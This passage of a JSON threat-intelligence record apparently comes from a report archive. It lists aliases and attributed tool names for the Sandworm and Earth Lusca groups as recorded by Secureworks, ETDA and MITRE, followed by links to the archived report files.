				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434657,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/273e5115e607c7e11811058ba8ea8e148fadb6cf.pdf",
		"text": "https://archive.orkl.eu/273e5115e607c7e11811058ba8ea8e148fadb6cf.txt",
		"img": "https://archive.orkl.eu/273e5115e607c7e11811058ba8ea8e148fadb6cf.jpg"
	}
}